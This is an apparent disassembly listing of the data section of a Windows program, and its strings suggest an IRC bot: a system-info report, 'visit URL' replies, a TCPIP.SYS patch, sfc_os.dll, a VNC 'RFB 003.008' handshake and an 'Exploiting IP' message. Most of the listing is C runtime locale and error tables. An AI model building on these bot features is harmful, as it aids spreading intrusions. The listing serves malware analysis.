align 4
aMe_1 db 'ME',0 ; DATA XREF: sub_41B964+7E�o
align 4
a2k_0 db '2K',0 ; DATA XREF: sub_41B964+98�o
align 10h
aXp_0 db 'XP',0 ; DATA XREF: sub_41B964+AA�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_41B964+BA�o
align 4
a???_0 db '???',0 ; DATA XREF: sub_41B964:loc_41BA27�o
; char aSS_12[]
aSS_12 db '%s (%s)',0 ; DATA XREF: sub_41B964+EB�o
word_4526B8 dw 3Fh ; DATA XREF: sub_41B964:loc_41BA66�r
align 4
; char aCouldnTResolve[]
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41B964:loc_41BAC8�o
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41B964+192�o
aHhMmSs_0 db 'HH:mm:ss',0 ; DATA XREF: sub_41B964+1AE�o
align 4
; char asc_4526EC[]
asc_4526EC db '-' ; DATA XREF: sub_41B964+297�o
db 3, 34h, 2
dd 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
; char aNotConnected[]
aNotConnected db 'Not connected',0 ; DATA XREF: sub_41BC18+48�o
align 4
aDialUp db 'Dial-up',0 ; DATA XREF: sub_41BC18+5B�o
off_4527E0 dd offset dword_4E414C ; DATA XREF: sub_41BC18:loc_41BC7A�o
; char aNA[]
aNA db 'N/A',0 ; DATA XREF: sub_41BC18+6F�o
; char aNA_0[]
aNA_0 db 'N/A',0 ; DATA XREF: sub_41BC18+82�o
; char asc_4527EC[]
asc_4527EC db '-' ; DATA XREF: sub_41BC18+A7�o
db 3, 34h, 2
dd 6974656Eh, 26F666Eh, 2202D03h, 65707954h, 25203A02h
dd 25282073h, 202E2973h, 20504902h, 72646441h, 2737365h
dd 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h, 7325203Ah
dd 2Eh
dword_452830 dd 2A2F2Ah ; DATA XREF: .text:0041BD18�o
dword_452834 dd 234032Dh, 69736976h, 2D030274h, 766E4920h, 64696C61h
; DATA XREF: .text:0041BE7D�o
dd 4C525520h, 2Eh
unk_452850 db 2Dh ; - ; DATA XREF: .text:loc_41BE8F�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 4
unk_45287C db 2Dh ; - ; DATA XREF: .text:loc_41BE96�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 4
dword_4528AC dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: .text:0041BE69�o
dd 64657469h, 2Eh
unk_4528C8 db 2Dh ; - ; DATA XREF: .text:loc_41BE70�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 4
asc_452904: ; DATA XREF: .text:0041BF83�o
unicode 0, <\>,0
a2: ; DATA XREF: .text:0041C09B�o
unicode 0, <2>,0
aS_bck db '%s.bck',0 ; DATA XREF: .text:0041C0C7�o
align 4
aSfc_os_dll db 'sfc_os.dll',0 ; DATA XREF: sub_41C0EF+24�o
align 10h
asc_452920: ; DATA XREF: .text:0041C157�o
unicode 0, <L>,0
dword_452924 dd 16h ; DATA XREF: .text:0041C165�o
dword_452928 dd 6 ; DATA XREF: .text:0041C16C�o
dword_45292C dd 0E8h ; DATA XREF: .text:0041C17A�o
dword_452930 dd 3 ; DATA XREF: .text:0041C181�o
dword_452934 dd 43h ; DATA XREF: .text:0041C196�o
dword_452938 dd 0FCh ; DATA XREF: .text:0041C19D�o
dword_45293C dd 5 ; DATA XREF: .text:0041C1A4�o
dword_452940 dd 0E8h ; DATA XREF: .text:0041C1B2�o
dword_452944 dd 3 ; DATA XREF: .text:0041C1B9�o
dword_452948 dd 0E5h ; DATA XREF: .text:0041C1CE�o
dword_45294C dd 0C8h ; DATA XREF: .text:0041C1D5�o
dword_452950 dd 99h ; DATA XREF: .text:0041C1DC�o
dword_452954 dd 47h ; DATA XREF: .text:0041C1E3�o
dword_452958 dd 0C8h ; DATA XREF: .text:0041C1EA�o
dword_45295C dd 622B72h ; DATA XREF: .text:0041C274�o
aCanNotOpenTcpi db 'Can not open TCPIP.SYS, version %d.',0 ; DATA XREF: .text:0041C294�o
aTcpip_sysFixed db 'TCPIP.SYS fixed, version %d.',0 ; DATA XREF: .text:0041C59F�o
align 4
; char aS_32[]
aS_32 db '%s',0 ; DATA XREF: sub_41C5F5+1A�o
align 4
word_4529A8 dw 4 ; DATA XREF: sub_41C624+10�r
align 4
word_4529AC dw 1 ; DATA XREF: sub_41C624+24�r
align 10h
aRfb003_008 db 'RFB 003.008',0Ah,0 ; DATA XREF: sub_41C76A+C�o
align 10h
dword_4529C0 dd 201h ; DATA XREF: sub_41C76A+1E�o
word_4529C4 dw 1 ; DATA XREF: sub_41C76A+14�r
align 4
word_4529C8 dw 1 ; DATA XREF: sub_41C76A+58�r
align 4
dword_4529CC dd 0EBFFh ; DATA XREF: sub_41C76A+33�o
dword_4529D0 dd 51FFh ; DATA XREF: sub_41C76A+3E�o
dword_4529D4 dd 0DFFh ; DATA XREF: sub_41C76A+49�o
word_4529D8 dw 72h ; DATA XREF: sub_41C76A+64�r
align 4
; char aC_4[]
aC_4 db '%c',0 ; DATA XREF: sub_41C76A+201�o
align 10h
; char aSExploitingIpS[]
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_41C76A+2D1�o
align 10h
dword_452A00 dd 1 ; DATA XREF: __heap_alloc_dbg+10�r
; __heap_alloc_dbg+F2�r ...
dword_452A04 dd 25h ; DATA XREF: __heap_alloc_dbg:loc_41CDEC�r
; __heap_alloc_dbg:loc_41CF55�r ...
dword_452A08 dd 0FFFFFFFFh ; DATA XREF: __heap_alloc_dbg+58�r
; _realloc_help+9E�r ...
byte_452A0C db 0FDh ; DATA XREF: __heap_alloc_dbg+2B7�r
; __heap_alloc_dbg+2D1�r ...
byte_452A0D db 0DDh ; DATA XREF: sub_41D8A0+257�r
; sub_41D8A0+39B�r ...
byte_452A0E db 0CDh ; DATA XREF: __heap_alloc_dbg+2F1�r
; _realloc_help+377�r
align 10h
; char off_452A10[]
off_452A10 dd offset aFree ; DATA XREF: sub_41D8A0+177�r
; sub_41D8A0+1DD�r ...
; "Free"
dd offset aNormal_0 ; "Normal"
dd offset aCrt ; "CRT"
dd offset aIgnore ; "Ignore"
dd offset aClient ; "Client"
align 10h
dword_452A30 dd 173Fh ; DATA XREF: _floor+B�r
dd 9875h, 9873h
off_452A3C dd offset __fpmath ; DATA XREF: __cinit+3�r __cinit+C�r
dd offset __initp_misc_winxfltr
dd offset __initp_misc_winxfltr
dword_452A48 dd 1B3Fh ; DATA XREF: _ceil+B�r
dword_452A4C dd 19930520h, 4 dup(0) ; DATA XREF: __NLG_Notify1+2�o
; __NLG_Notify+2�o
off_452A60 dd offset __exit ; DATA XREF: __amsg_exit+22�r
dword_452A64 dd 2 ; DATA XREF: __FF_MSGBANNER+15�r
; __NMSG_WRITE+86�r ...
off_452A68 dd offset dword_4F4EA0 ; DATA XREF: ___initstdio+B3�o
; __lock_file+3�o ...
align 10h
dd offset dword_4F4EA0
dd 101h
dword_452A78 dd 0FFFFFFFFh ; DATA XREF: ___initstdio+11C�w
dd 0
dd 1000h, 0
dword_452A88 dd 3 dup(0) ; DATA XREF: __flsbuf+111�o
; __stbuf:loc_42AB93�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_452AA8 dd 3 dup(0) ; DATA XREF: __flsbuf+11A�o
; __stbuf:loc_42ABA5�o
dd 2, 0FFFFFFFFh, 83h dup(0)
dword_452CC8 dd 8 dup(0) ; DATA XREF: __lock_file+C�o
; __unlock_file+C�o
dword_452CE8 dd 0FFFFFFFFh ; DATA XREF: __CrtDbgReport+80�o
; __CrtDbgReport+108�o ...
dword_452CEC dd 2 ; DATA XREF: __CrtSetReportMode+1E�r
; __CrtSetReportMode+39�r ...
dd 2 dup(4)
dword_452CF8 dd 0FFFFFFFFh ; DATA XREF: __CrtSetReportFile+20�r
; __CrtSetReportFile+2C�r ...
dd 2 dup(0FFFFFFFFh)
off_452D04 dd offset aWarning ; DATA XREF: _CrtMessageWindow+284�r
; "Warning"
dd offset aError ; "Error"
dd offset aAssertionFai_1 ; "Assertion Failed"
dword_452D10 dd 0 ; DATA XREF: __mtdeletelocks+1F�r
; __mtdeletelocks+44�r ...
off_452D14 dd offset dword_4F4800 ; DATA XREF: __mtinitlocks+29�r
; __mtdeletelocks+8F�r
dd 7 dup(0)
off_452D34 dd offset dword_4F4830 ; DATA XREF: __mtinitlocks+1C�r
; __mtdeletelocks:loc_424069�r
dd 3 dup(0)
off_452D44 dd offset dword_4F4848 ; DATA XREF: __mtinitlocks+F�r
; __mtdeletelocks+75�r
dd 3 dup(0)
off_452D54 dd offset dword_4F4818 ; DATA XREF: __mtinitlocks+3�r
; __mtdeletelocks+82�r
dd 7 dup(0)
dd 9427F8h, 16h dup(0)
off_452DD0 dd offset unknown_libname_5 ; DATA XREF: __heap_alloc_dbg+79�r
; _realloc_help+C1�r ...
; Microsoft VisualC 2-8/net runtime
align 8
off_452DD8 dd offset off_452DD8 ; DATA XREF: ___sbh_new_region+F�o
; ___sbh_new_region+7A�o ...
off_452DDC dd offset off_452DD8 ; DATA XREF: ___sbh_new_region:loc_426C06�r
; ___sbh_new_region+9F�w ...
dd offset dword_452DF0
dd offset dword_452DF0
dword_452DE8 dd 0FFFFFFFFh ; DATA XREF: ___sbh_new_region+6�r
; ___sbh_release_region:loc_426DB7�w
dd 0FFFFFFFFh
dword_452DF0 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: .data:00452DE0�o
; .data:00452DE4�o
off_454DF8 dd offset off_452DD8 ; DATA XREF: ___sbh_release_region+17�r
; ___sbh_release_region+28�w ...
dword_454DFC dd 1E0h ; DATA XREF: __heap_alloc_base+AE�r
; sub_424440+146�r ...
dd 10h
off_454E04 dd offset __wctype+2 ; DATA XREF: __printMemBlockData+7C�r
; _atol+2D�r ...
off_454E08 dd offset __wctype+2 ; DATA XREF: unknown_libname_24+2A4�w
; unknown_libname_24+35B�w ...
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: unknown_libname_24:loc_435C81�o
; unknown_libname_24+35B�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
; size_t SrcSizeInBytes
SrcSizeInBytes dd 1 ; DATA XREF: __printMemBlockData+4E�r
; _atol:loc_41F436�r ...
byte_455014 db 2Eh ; DATA XREF: unknown_libname_7:loc_42BBC7�r
; unknown_libname_7+ED2�r ...
align 4
dword_455018 dd 1 ; DATA XREF: ___init_numeric+169�w
; ___init_numeric+296�w
off_45501C dd offset aNull ; DATA XREF: sub_428D80:loc_4291C9�r
; sub_428D80+583�r
; "(null)"
off_455020 dd offset aNull_0 ; DATA XREF: sub_428D80+51B�r
; "(null)"
dword_455024 dd 3 ; DATA XREF: __mtinit+F�w __mtinit+14�r ...
byte_455028 db 1 ; DATA XREF: __setmbcp+12F�r
db 2, 4, 8
align 10h
dword_455030 dd 3A4h ; DATA XREF: __setmbcp+7E�r
word_455034 dw 8260h ; DATA XREF: __setmbcp+192�r
dw 8279h
dd 21h, 0
dword_455040 dd 0DFA6h ; DATA XREF: __setmbcp+D5�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_455120 dd 1 ; DATA XREF: __dosmaperr+2C�r
dword_455124 dd 16h ; DATA XREF: __dosmaperr+3D�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
asc_455288 db ' ',9,'-',0Dh,']',0 ; DATA XREF: unknown_libname_7:loc_42B162�o
align 10h
asc_455290: ; DATA XREF: unknown_libname_7:loc_42B13D�o
unicode 0, <]>,0
align 8
dword_455298 dd 14h ; DATA XREF: __get_fname+1F�r
off_45529C dd offset aExp ; DATA XREF: __get_fname+2E�r
; "exp"
dd 1Dh
dd offset aPow ; "pow"
dd 1Ah
dd offset aLog_0 ; "log"
dd 1Bh
dd offset aLog10 ; "log10"
dd 1Fh
dd offset aSinh ; "sinh"
dd 13h
dd offset aCosh ; "cosh"
dd 21h
dd offset aTanh ; "tanh"
dd 0Eh
dd offset aAsin ; "asin"
dd 0Dh
dd offset aAcos ; "acos"
dd 0Fh
dd offset aAtan ; "atan"
dd 10h
dd offset aAtan2 ; "atan2"
dd 5
dd offset aSqrt ; "sqrt"
dd 1Eh
dd offset aSin ; "sin"
dd 12h
dd offset aCos ; "cos"
dd 20h
dd offset aTan ; "tan"
dd 0Ch
dd offset aCeil ; "ceil"
dd 0Bh
dd offset aFloor ; "floor"
dd 15h
dd offset aFabs ; "fabs"
dd 1Ch
dd offset aModf ; "modf"
dd 19h
dd offset aLdexp ; "ldexp"
dd 11h
dd offset a_cabs ; "_cabs"
dd 18h
off_455344 dd offset a_hypot ; DATA XREF: .data:00455EC4�o
; "_hypot"
dd 16h
dd offset aFmod ; "fmod"
dd 17h
dd offset aFrexp ; "frexp"
dd 22h
dd offset a_y0 ; "_y0"
dd 23h
dd offset a_y1 ; "_y1"
dd 24h
dd offset a_yn ; "_yn"
dbl_455370 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+E4�r
; __handle_exc:loc_42CA87�r ...
dd 0
dd 0FFF80000h
dbl_455380 dq 1.797693134862316e308 ; DATA XREF: __handle_exc:loc_42CACA�r
; __handle_exc+167�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_455398 dt 2.3562723457267347066e313 ; DATA XREF: __set_statfp+13�r
; __set_statfp+2A�r
align 4
tbyte_4553A4 dt 1.9149954921904370718e-1233 ; DATA XREF: __set_statfp+41�r
align 10h
off_4553B0 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+3�w
; sub_428D80+713�r
off_4553B4 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+D�w
; sub_428D80+759�r
off_4553B8 dd offset __fassign ; DATA XREF: __cfltcvt_init+17�w
; unknown_libname_7+1138�r
off_4553BC dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+21�w
; sub_428D80+736�r
off_4553C0 dd offset __positive ; DATA XREF: __cfltcvt_init+2B�w
off_4553C4 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+35�w
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 10h
off_4553D0 dd offset ?terminate@@YAXXZ ; DATA XREF: sub_42E7C0+2D�r
; sub_42E7C0+3D�r
; terminate(void)
dword_4553D4 dd 43h ; DATA XREF: __setlocale_set_cat:loc_42EE9C�o
; .data:004554F0�o ...
; char aC_2[]
aC_2 db 'C',0 ; DATA XREF: __expandlocale+8D�o
; __expandlocale+117�o ...
align 4
dd 20h dup(0)
; char aC_3[]
aC_3 db 'C',0 ; DATA XREF: __expandlocale+74�o
; __expandlocale+FC�o ...
align 10h
dd 20h dup(0)
off_4554E0 dd offset aLc_all ; DATA XREF: _setlocale+17F�r
; _setlocale+198�r ...
; "LC_ALL"
; char *dword_4554E4
dword_4554E4 dd 0 ; DATA XREF: _setlocale+77�r
; _setlocale+320�r ...
off_4554E8 dd offset sub_42F160 ; DATA XREF: __setlocale_set_cat+12B�r
dd offset aLc_collate ; "LC_COLLATE"
dd offset dword_4553D4
dd offset sub_435CD0
dd offset aLc_ctype ; "LC_CTYPE"
off_4554FC dd offset dword_4553D4 ; DATA XREF: __setlocale_get_all+F0�r
dd offset unknown_libname_24 ; Microsoft VisualC 2-8/net runtime
dd offset aLc_monetary ; "LC_MONETARY"
dd offset dword_4553D4
dd offset ___init_monetary
dd offset aLc_numeric ; "LC_NUMERIC"
dd offset dword_4553D4
dd offset ___init_numeric
dd offset aLc_time ; "LC_TIME"
dd offset dword_4553D4
dd offset ___init_time
dword_455528 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __initptd+6�o
; __freeptd+CE�o ...
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_4555A0 dd 3 ; DATA XREF: __XcptFilter+98�r
; __XcptFilter:loc_42FF0B�r ...
dword_4555A4 dd 7 ; DATA XREF: __XcptFilter+B1�r
; _raise+17D�r
dword_4555A8 dd 78h ; DATA XREF: .text:00431508�r
; .text:00431526�r
dword_4555AC dd 0Ah ; DATA XREF: _xcptlookup+1D�r
; _xcptlookup:loc_430052�r ...
dword_4555B0 dd 0FFFFFFFFh, 0A00h, 8 dup(0) ; DATA XREF: __filbuf:loc_428076�o
; __flsbuf:loc_428CF9�o
dword_4555D8 dd 2 ; DATA XREF: __NMSG_WRITE+2A�r
; __NMSG_WRITE+3D�r ...
; char *off_4555DC
off_4555DC dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+56�r
; __NMSG_WRITE+98�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8
dd offset aR6008NotEnough ; "R6008\r\n- not enough space for arguments"...
dd 9
dd offset aR6009NotEnough ; "R6009\r\n- not enough space for environme"...
dd 0Ah
dd offset aAbnormalProgra ; "\r\nabnormal program termination\r\n"
dd 10h
dd offset aR6016NotEnough ; "R6016\r\n- not enough space for thread da"...
dd 11h
dd offset aR6017Unexpecte ; "R6017\r\n- unexpected multithread lock er"...
dd 12h
dd offset aR6018Unexpecte ; "R6018\r\n- unexpected heap error\r\n"
dd 13h
dd offset aR6019UnableToO ; "R6019\r\n- unable to open console device\r"...
dd 18h
dd offset aR6024NotEnough ; "R6024\r\n- not enough space for _onexit/a"...
dd 19h
dd offset aR6025PureVirtu ; "R6025\r\n- pure virtual function call\r\n"
dd 1Ah
dd offset aR6026NotEnough ; "R6026\r\n- not enough space for stdio ini"...
dd 1Bh
dd offset aR6027NotEnough ; "R6027\r\n- not enough space for lowio ini"...
dd 1Ch
dd offset aR6028UnableToI ; "R6028\r\n- unable to initialize heap\r\n"
dd 78h
dd offset aDomainError ; "DOMAIN error\r\n"
dd 79h
dd offset aSingError ; "SING error\r\n"
dword_455650 dd 7Ah ; DATA XREF: .data:00455890�o
dd offset aTlossError ; "TLOSS error\r\n"
dd 0FCh
dd offset asc_43E464 ; "\r\n"
dd 0FFh
dd offset aRuntimeError ; "runtime error "
align 10h
dword_455670 dd 2694h ; DATA XREF: __handle_qnan1+3�r
; __handle_qnan2+F�r ...
align 8
dword_455678 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_4338D0+3�o
dword_455690 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_4338F0+3�o
dword_4556A8 dd 7080h ; DATA XREF: ___loctotime_t+92�r
; __tzset_lk+80�w ...
dword_4556AC dd 1 ; DATA XREF: ___loctotime_t+C2�r
; __tzset_lk+BF�w ...
dword_4556B0 dd 0FFFFF1F0h ; DATA XREF: ___loctotime_t+DE�r
; __tzset_lk+D7�w ...
dword_4556B4 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:off_455734�o
dword_4556F4 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:off_455738�o
; char *off_455734
off_455734 dd offset dword_4556B4 ; DATA XREF: __tzset_lk+FA�r
; __tzset_lk+123�r ...
; char *off_455738
off_455738 dd offset dword_4556F4 ; DATA XREF: __tzset_lk+140�r
; __tzset_lk+16A�r ...
align 10h
dword_455740 dd 0FFFFFFFFh ; DATA XREF: __tzset_lk+30�w
; sub_434320+1A�r ...
dword_455744 dd 0 ; DATA XREF: sub_434320:loc_43451B�r
; sub_434320+20F�r ...
dword_455748 dd 0 ; DATA XREF: sub_434320+2CF�r
; _cvtdate+13D�w
align 10h
dword_455750 dd 0FFFFFFFFh ; DATA XREF: __tzset_lk+21�w
; __tzset_lk+2B�r ...
dword_455754 dd 0 ; DATA XREF: sub_434320+201�r
; sub_434320+21D�r ...
dword_455758 dd 0 ; DATA XREF: sub_434320+2E5�r
; _cvtdate+1D�r ...
dword_45575C dd 0FFFFFFFFh ; DATA XREF: _cvtdate+B0�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_45578C dd 16Dh ; DATA XREF: ___loctotime_t+2E�r
; _cvtdate+2C�r ...
dword_455790 dd 0FFFFFFFFh ; DATA XREF: _cvtdate+BF�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 3 dup(0)
dword_4557D0 dd 40Ah ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+3E�r
; crtGetLocaleInfoA(x,x,x,x)+147�r
a040a db '040a',0 ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+9A�o
align 4
off_4557DC dd offset aSpanishTraditi ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+AB�r
; "Spanish - Traditional Sort"
dword_4557E0 dd 505345h ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+BC�o
off_4557E4 dd offset aSpain ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+CD�r
; "Spain"
dword_4557E8 dd 505345h ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+DE�o
dword_4557EC dd 303538h, 0 ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+EF�o
a1252 db '1252',0 ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+100�o
align 4
dd 40Bh, 62303430h, 0
dd offset aFinnish ; "Finnish"
dd offset word_4E4946
dd offset aFinland ; "Finland"
dd offset word_4E4946
dd 303538h, 0
a1252_0 db '1252',0
align 4
dd 40Ch, 63303430h, 0
dd offset aFrench ; "French"
dd 415246h
dd offset aFrance ; "France"
dd 415246h, 303538h, 0
a1252_1 db '1252',0
align 4
dd 40Fh, 66303430h, 0
dd offset aIcelandic ; "Icelandic"
dd offset byte_4C5349
dd offset aIceland ; "Iceland"
dd offset byte_4C5349
dd 303538h, 0
a1252_2 db '1252',0
align 10h
dd 41Dh, 64313430h, 0
dd offset aSwedish ; "Swedish"
dd offset dword_455650+3
dd offset aSweden ; "Sweden"
dd offset dword_455750+3
dd 303538h, 0
a1252_3 db '1252',0
align 4
dd 42Dh, 64323430h, 0
dd offset aBasque ; "Basque"
dd 515545h
dd offset aSpain ; "Spain"
dd 505345h, 303538h, 0
a1252_4 db '1252',0
align 4
db 0Ah
db 8,0
align 4
a080a db '080a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4D5345
dd offset aMexico ; "Mexico"
dd 58454Dh, 303538h, 0
a1252_5 db '1252',0
align 4
dd 80Ch, 63303830h, 0
dd offset aFrench ; "French"
dd 425246h
dd offset aBelgium ; "Belgium"
dd offset word_4C4542
dd 303538h, 0
a1252_6 db '1252',0
align 10h
dd 0C07h, 37306330h, 0
dd offset aGerman ; "German"
dd 414544h
dd offset aAustria ; "Austria"
dd 545541h, 303538h, 0
a1252_7 db '1252',0
align 4
dd 0C09h, 39306330h, 0
dd offset aEnglish ; "English"
dd 414E45h
dd offset aAustralia ; "Australia"
dd 535541h, 303538h, 0
a1252_8 db '1252',0
align 4
dd 0C0Ah, 61306330h, 0
dd offset aSpanishModernS ; "Spanish - Modern Sort"
dd offset byte_4E5345
dd offset aSpain ; "Spain"
dd 505345h, 303538h, 0
a1252_9 db '1252',0
align 4
dd 0C0Ch, 63306330h, 0
dd offset aFrench ; "French"
dd 435246h
dd offset aCanada ; "Canada"
dd offset dword_4E4140+3
dd 303538h, 0
a1252_10 db '1252',0
align 10h
dd 100Ah, 61303031h, 0
dd offset aSpanish ; "Spanish"
dd offset byte_475345
dd offset aGuatemala ; "Guatemala"
dd offset byte_4D5447
dd 303538h, 0
a1252_11 db '1252',0
align 4
dd 100Ch, 63303031h, 0
dd offset aFrench ; "French"
dd 535246h
dd offset aSwitzerland ; "Switzerland"
dd offset dword_452DF0+1A53h
dd 303538h, 0
a1252_12 db '1252',0
align 4
dword_455A38 dd 140Ah, 61303431h, 0 ; DATA XREF: .data:00455CA4�o
dd offset aSpanish ; "Spanish"
dd 435345h
dd offset aCostaRica ; "Costa Rica"
dd offset byte_495243
dd 303538h, 0
a1252_13 db '1252',0
align 4
dd 140Ch, 63303431h, 0
dd offset aFrench ; "French"
dd offset word_4C5246
dd offset aLuxembourg ; "Luxembourg"
dd 58554Ch, 303538h, 0
a1252_14 db '1252',0
align 10h
dd 180Ah, 61303831h, 0
dd offset aSpanish ; "Spanish"
dd 415345h
dd offset aPanama ; "Panama"
dd offset dword_4E4150
dd 303538h, 0
a1252_15 db '1252',0
align 4
dd 1C09h, 39306331h, 0
dd offset aEnglish ; "English"
dd 534E45h
dd offset aSouthAfrica ; "South Africa"
dd offset word_46415A
dd 373334h, 0
a1252_16 db '1252',0
align 4
dd 1C0Ah, 61306331h, 0
dd offset aSpanish ; "Spanish"
dd offset aErrorGetting_0+5
dd offset aDominicanRepub ; "Dominican Republic"
dd offset dword_4D4F44
dd 303538h, 0
a1252_17 db '1252',0
align 4
db 0Ah
db ' ',0
align 4
a200a db '200a',0
align 10h
dd offset aSpanish ; "Spanish"
dd 565345h
dd offset aVenezuela ; "Venezuela"
dd offset word_4E4556
dd 303538h, 0
a1252_18 db '1252',0
align 10h
db 0Ah
db '$',0
align 4
a240a db '240a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4F5345
dd offset aColombia ; "Colombia"
dd offset byte_4C4F43
dd 303538h, 0
a1252_19 db '1252',0
align 4
db 0Ah
db '(',0
align 10h
a280a db '280a',0
align 4
dd offset aSpanish ; "Spanish"
dd 525345h
dd offset aPeru ; "Peru"
dd 524550h, 303538h, 0
a1252_20 db '1252',0
align 4
db 0Ah
db ',',0
align 4
a2c0a db '2c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 535345h
dd offset aArgentina ; "Argentina"
dd offset byte_475241
dd 303538h, 0
a1252_21 db '1252',0
align 4
a0 db 0Ah
db '0',0
align 4
a300a db '300a',0
align 10h
dd offset aSpanish ; "Spanish"
dd offset byte_465345
dd offset aEcuador ; "Ecuador"
dd 554345h, 303538h, 0
a1252_22 db '1252',0
align 10h
a4 db 0Ah
db '4',0
align 4
a340a db '340a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4C5345
dd offset aChile ; "Chile"
dd offset byte_4C4843
dd 303538h, 0
a1252_23 db '1252',0
align 4
a8 db 0Ah
db '8',0
align 10h
a380a db '380a',0
align 4
dd offset aSpanish ; "Spanish"
dd 595345h
dd offset aUruguay ; "Uruguay"
dd 595255h, 303538h, 0
a1252_24 db '1252',0
align 4
db 0Ah
db '<',0
align 4
a3c0a db '3c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 5A5345h
dd offset aParaguay ; "Paraguay"
dd 595250h, 303538h, 0
a1252_25 db '1252',0
align 4
word_455C74 dw 0C0Ch ; DATA XREF: _TestDefaultCountry+34�r
dw 0C1Ah
dd 4361007h, 42D080Ch, 100C0403h, 81D0810h
off_455C88 dd offset aAmerica ; DATA XREF: ___get_qualified_locale+9C�o
; "america"
dd 415355h
